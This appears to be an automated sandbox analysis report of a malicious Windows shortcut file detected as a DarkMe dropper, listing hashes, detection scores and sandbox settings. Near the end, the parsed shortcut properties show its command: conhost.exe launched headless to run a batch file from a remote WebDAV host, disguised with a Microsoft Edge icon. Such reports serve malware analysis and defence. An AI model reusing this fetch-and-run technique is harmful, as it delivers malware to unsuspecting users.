Windows
Analysis Report
0wQAKXU1Qj.lnk
Overview
General Information
Sample name: | 0wQAKXU1Qj.lnkrenamed because original name is a hash value |
Original sample name: | 34cf21083fdb0d85a6cd4a3291b356d1.lnk |
Analysis ID: | 1527269 |
MD5: | 34cf21083fdb0d85a6cd4a3291b356d1 |
SHA1: | 4b09b86eebe56ca114e1a44723940a14485a99df |
SHA256: | a3631238cc42d9937f0ea4a3422bc65ab38d063616f754798e01a4abfa434981 |
Tags: | lnkuser-abuse_ch |
Errors
|
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Classification label: |
Source: | ReversingLabs: |
Source: | LNK file: |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
18% | ReversingLabs | Shortcut.Dropper.DarkMe |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1527269 |
Start date and time: | 2024-10-06 22:12:07 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 1m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 2 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 0wQAKXU1Qj.lnkrenamed because original name is a hash value |
Original Sample Name: | 34cf21083fdb0d85a6cd4a3291b356d1.lnk |
Detection: | MAL |
Classification: | mal48.winLNK@0/0@0/0 |
Cookbook Comments: |
|
- No process behavior to analyse as no analysis process or sample was found
- Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
- Not all processes where analyzed, report is missing behavior information
- VT rate limit hit for: 0wQAKXU1Qj.lnk
File type: | |
Entropy (8bit): | 4.482082635143518 |
TrID: |
|
File name: | 0wQAKXU1Qj.lnk |
File size: | 1'339 bytes |
MD5: | 34cf21083fdb0d85a6cd4a3291b356d1 |
SHA1: | 4b09b86eebe56ca114e1a44723940a14485a99df |
SHA256: | a3631238cc42d9937f0ea4a3422bc65ab38d063616f754798e01a4abfa434981 |
SHA512: | 0349d4df9cc3215d8993bc29091032fe9e8ec5366636c5aaaaed22a281ff5e35f3eda595148cfe16a6c00236f70664ae765ed67e6535ebc1e27e70729bbb7a68 |
SSDEEP: | 24:8TJbmOuNVz1A4UPAdi+/sdlleC+GYYqVgqe7ab/rMTcm:8T1mjNVze4l8dllT2Bhe7ab4c |
TLSH: | 1A2100182AF80726E7B24E3380B327364637F806EE544F1E528942480C57B05E938F7F |
File Content Preview: | L..................F.... ......h.......h.......h............................A....P.O. .:i.....+00.../C:\...................V.1......X....Windows.@........R.@.X..............................j.W.i.n.d.o.w.s.....Z.1......X....System32..B........R.@.X........ |
Icon Hash: | 74f4f4dcece9e9ed |
General | |
---|---|
Relative Path: | ..\..\..\..\Windows\System32\conhost.exe |
Command Line Argument: | --headless \\payhostmsa.shop@5824\DavWWWRoot\new.bat |
Icon location: | %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe |